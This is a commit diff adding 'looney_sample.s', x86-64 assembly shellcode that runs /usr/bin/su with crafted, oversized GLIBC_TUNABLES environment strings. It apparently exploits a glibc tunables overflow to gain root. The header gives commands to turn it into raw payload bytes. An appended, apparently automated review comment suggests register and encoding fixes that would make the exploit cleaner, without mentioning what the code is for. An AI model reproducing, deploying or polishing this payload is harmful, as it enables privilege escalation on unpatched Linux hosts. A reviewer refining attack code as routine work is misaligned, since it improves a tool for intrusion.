
a858bb2704ca8762da737c8bf7b8bf67998a2b5f — isra 5 months ago 6333bf2
added sample assembly code used for payload
1 files changed, 83 insertions(+), 0 deletions(-)

A looney_sample.s
A looney_sample.s => looney_sample.s +83 -0
@@ 0,0 1,83 @@
;objcopy -O binary -j .text execve.o execve
;od -An -v -t x1 execve > hexcontent

BITS 64
global main
section .text
main:
    call run
    db "/usr/bin/su", 0x0
    db "--help", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP", 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=XXXXXXXX", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=XXXXXXX", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=YYYYYYYYYYYYYYYYYYYYYYYY", 0x0
    db `\f\20\20\20\376\177`, 0x0
    db `\370\377\377\377\377\377\377\377\370`, 0x0 ; repeate 16382 times
    
 run:
    ;;;;;;;;;;;;;;;;;;;;;;;;;
    ; call su
    ;;;;;;;;;;;;;;;;;;;;;;;;;
    pop rsi
    xor rax, rax
    ; filename "/usr/bin/su"
    lea rdi, [rsi]   
    

    ; envp (in reverse)
    push rax

    mov ecx, 47
    l1:
    dec ecx
    lea rbx, [rsi+835]
    push rbx
    jne l1

    mov ecx, 385
    l2:
    dec ecx
    lea rbx, [rsi+18]
    push rbx
    jne l2


    ; push addr
    lea rbx, [rsi+828] ; "addr in Q format"
    push rbx

    mov ecx, 172
    l3:
    dec ecx
    lea rbx, [rsi+18]
    push rbx
    jne l3


    lea rbx, [rsi+770] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=Y x 24"
    push rbx
    lea rbx, [rsi+711] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=X x 7"
    push rbx
    lea rbx, [rsi+651] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=X x 8"
    push rbx
    lea rbx, [rsi+19] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=P x 561"
    push rbx
    mov rdx, rsp

    ; argv
    ; ["/usr/bin/su", "--help"] (in reverse)
    push rax
    lea rbx, [rsi+12] ; "--help"
    push rbx
    push rdi          ; "/usr/bin/su"
    mov rsi, rsp 


    ; execve & exit
    xor rax, rax
    mov rax, 59
    syscall
    xor rdx, rdx
    mov rax, 60
    syscall
\ No newline at end of file
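Review bot: The exit path at the end of `run` clears the wrong register: `exit` (syscall 60) takes its status in rdi, so the `xor rdx, rdx` before `mov rax, 60` has no effect and the process exits with the low byte of the `/usr/bin/su` pointer that has sat in rdi since `lea rdi, [rsi]` as its status; `xor edi, edi` is what was meant. The `xor rax, rax` directly before `mov rax, 59` is dead, and both syscall-number loads can be written `mov eax, 59` / `mov eax, 60`, which zero the upper half anyway with a shorter encoding. The `rsi+N` offsets (12, 19, 651, 711, 770, 828, 835) are unlabelled magic numbers that silently break if any `db` line changes length, and the comment on `lea rbx, [rsi+770]` names a doubled `glibc.mem.tagging=` prefix that the string at that offset does not have; a comment next to each `db` line stating its offset and length would make the layout checkable.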